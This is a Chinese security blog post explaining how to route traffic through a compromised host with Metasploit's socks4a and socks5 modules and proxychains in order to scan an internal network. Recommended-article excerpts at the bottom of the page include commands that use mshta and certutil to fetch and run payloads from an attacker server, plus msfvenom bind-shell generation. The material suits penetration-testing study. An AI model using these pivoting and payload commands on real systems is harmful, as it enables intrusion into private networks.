Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >工具的使用|MSF搭建socks代理

工具的使用|MSF搭建socks代理

作者头像
谢公子
发布于 2022-01-19 11:43:22
发布于 2022-01-19 11:43:22
3.7K00
代码可运行
举报
文章被收录于专栏:谢公子学安全谢公子学安全
运行总次数:0
代码可运行

目录

搭建代理

添加路由

搭建Socks4a代理

搭建Socks5代理

连接代理

注:通过MSF起的socks代理,经常性的不监听端口,也就导致代理失败。试过好多次都是这样,应该是MSF的一个bug。

搭建代理

当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。

MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。我们一般用 socks4a和socks5进行代理。socks5可以设置用户名和密码。这里运行代理后,有时候MSF不会监听端口(有可能是个bug,试了好多次都有这种情况),所以也就导致代理失败。

添加路由

在使用代理之前,我们需要先添加路由,让MSF能到达目标机器内网。因为这里socks模块只是将代理设置为监听的端口(默认是1080),即通过proxychains的流量都转给本地的1080端口,又因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。

执行以下命令添加路由

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
route add 0.0.0.0 0.0.0.0 1

搭建Socks4a代理

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use auxiliary/server/socks4a
set SRVHOST  0.0.0.0
set SRVPORT  1080
run

搭建Socks5代理

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#使用socks5代理
use auxiliary/server/socks5
set SRVHOST  0.0.0.0
set SRVPORT  1080
set USERNAME root
set PASSWORD Password@
run

连接代理

首先修改/etc/proxychains.conf文件

然后执行命令前加上 proxychains命令

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#然后就可以使用其他命令了,比如nmap
proxychains4 nmap -p 1-10000 -Pn -sT x.x.x.x     #在打开其他程序前加上proxychains
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-10-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
红蓝对抗 | 内网渗透实战技巧
本文章是关于内网方面渗透技巧的一个文章,用的环境是VulnStack1,VulnStack是红日安全团队出的一个内网渗透的靶机环境,感谢红日团队
天钧
2020/03/12
2K0
内网渗透-代理篇
利用代理工具将内网的流量代理到本地进行访问,这样就可以对内网进行下一步渗透,同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议),工作在OSI参考模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本:
Power7089
2021/05/27
5.3K0
记一次MSF综合应用内网渗透记录
Date/time:2013年,很久没写技术文章了,记得之前写过MSF的reverse、bind两种反弹方式在实战中的应用,这次来写一篇MSF综合应用到内网渗透的实战文章。
潇湘信安
2022/01/21
1.5K0
记一次MSF综合应用内网渗透记录
KALI 内网渗透记录
虚拟机 KALI: 192.168.180.128 目标机器: 192.168.1.52
院长技术
2020/08/19
3K0
msfconsole是什么意思_msfconsole渗透手机
以社工等方法获取到xp主机的shell 通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机
全栈程序员站长
2022/10/29
6430
msfconsole是什么意思_msfconsole渗透手机
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
#网络通讯-MSF&CS-路由添加&节点建立 #控制上线-MSF&CS-协议生成&正反连接 代理协议: SOCKS4/5 代理软件: SocksCap Proxifier ProxyChains等 靶场环境搭建描述:
没事就要多学习
2024/07/18
3650
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
图解Meterpreter实现网络穿透的方法
纵向防御也被被称为为“多层防御”,这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险,在其中有些电脑被入侵或是泄密时,风险可大大降低。 举例说明,防毒软件被安装于个人工作站上,电脑中病毒在防火墙与服务器等其中类似环境中被拦拦下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析怎么用英语翻译。是什么意思进行网络穿透的。 何谓路由 确定设备如何在不同网络之间相互传输的过程,也即通过互联的网络把信息从源地址传输到目的地址的活动被称为为路由。 通常用于执行路由活动的设备被称为路由器。通
FB客服
2018/02/09
1.1K0
图解Meterpreter实现网络穿透的方法
使用msf入侵多层级网络架构
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?
Bypass
2020/06/04
1K0
利用MSF上线断网主机的思路分享
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta' 注意事项: 添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。 思路拓展: bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。 EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe' 0x04 Socks代理 + Proxychains 我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。 run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功? proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433 确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。 msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe 另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。 流量走向:
潇湘信安
2021/08/20
1.1K0
通过SOCKS代理渗透整个内网
经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。
全栈程序员站长
2022/07/05
1.8K0
通过SOCKS代理渗透整个内网
socks4代理网络渗透测试实验
一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将
全栈程序员站长
2022/07/02
7360
socks4代理网络渗透测试实验
工具的使用 | Metasploit Framework(MSF)的使用
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
谢公子
2022/01/13
3.6K0
工具的使用 | Metasploit Framework(MSF)的使用
三层网络靶场搭建&MSF内网渗透
在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。
HACK学习
2019/08/06
3K0
三层网络靶场搭建&MSF内网渗透
内网靶场实战——ATT&CK实战系列(一)
靶场地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 下载过文件后,需配置如下两个虚拟网络(一个内网,一个外网)
用户9691112
2023/05/18
8490
内网靶场实战——ATT&CK实战系列(一)
Vulnstack1 - 内网部分
漏洞环境为ATT&CK实战系列——红队实战(一),主要记录拿到Shell后再反弹MSF Shell、Mimikatz抓取密码以及登录域控等内网部分。前面漏洞环境搭建及打点等不作记录,可查看参考文章。 环境 Kali:192.168.8.128,攻击机 Win7: Web服务器,192.168.8.129 域用户stu1.god.org,192.168.52.143 Win2003:域控制器owa.god.org,192.168.52.138 反弹Shell 攻击机制作木马文件,实际环境中需做免杀 $ ms
Naraku
2021/07/29
8090
Vulnstack1 - 内网部分
安全攻防 | Metasploit 代理
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2021/03/16
1.6K0
ATT&CK实战系统-红队实战(一)
很久之前放到收藏夹里的红日靶机,之前总想着汇总一下打一打,但是硬盘没有太大空间就没有去下载搭建(其实就是懒),最近写毕设的过程中无聊换换脑子来打一打。
用户2700375
2023/01/30
8530
ATT&CK实战系统-红队实战(一)
记一次糟心的内网靶场实战
菜鸡又来发表文章了,一开始的时候对整个内网的拓扑结构还不熟,所以做的时候很乱,写的也很乱。有很多方法都没有想到去用。qaq大佬们多多指教。
Power7089
2020/12/11
2.5K1
记一次糟心的内网靶场实战
【vulhub靶场】medium_socnet
官网下载地址(下载比较慢):https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机百度云链接 第一次搭建时,进行主机探测,发现靶机只开了22 ssh服务,我寻思不能ssh爆破一下就结束了吧,查了一下资料,发现靶机还应该开放5000端口。遂重新下载导入了一次才正常(还有一种情况是连主机都探测不到,可能是网络适配器设置问题)
没事就要多学习
2024/07/18
3240
【vulhub靶场】medium_socnet
内网漫游之SOCKS代理大结局
在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。
Ms08067安全实验室
2019/09/24
2.4K0
内网漫游之SOCKS代理大结局
相关推荐
红蓝对抗 | 内网渗透实战技巧
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验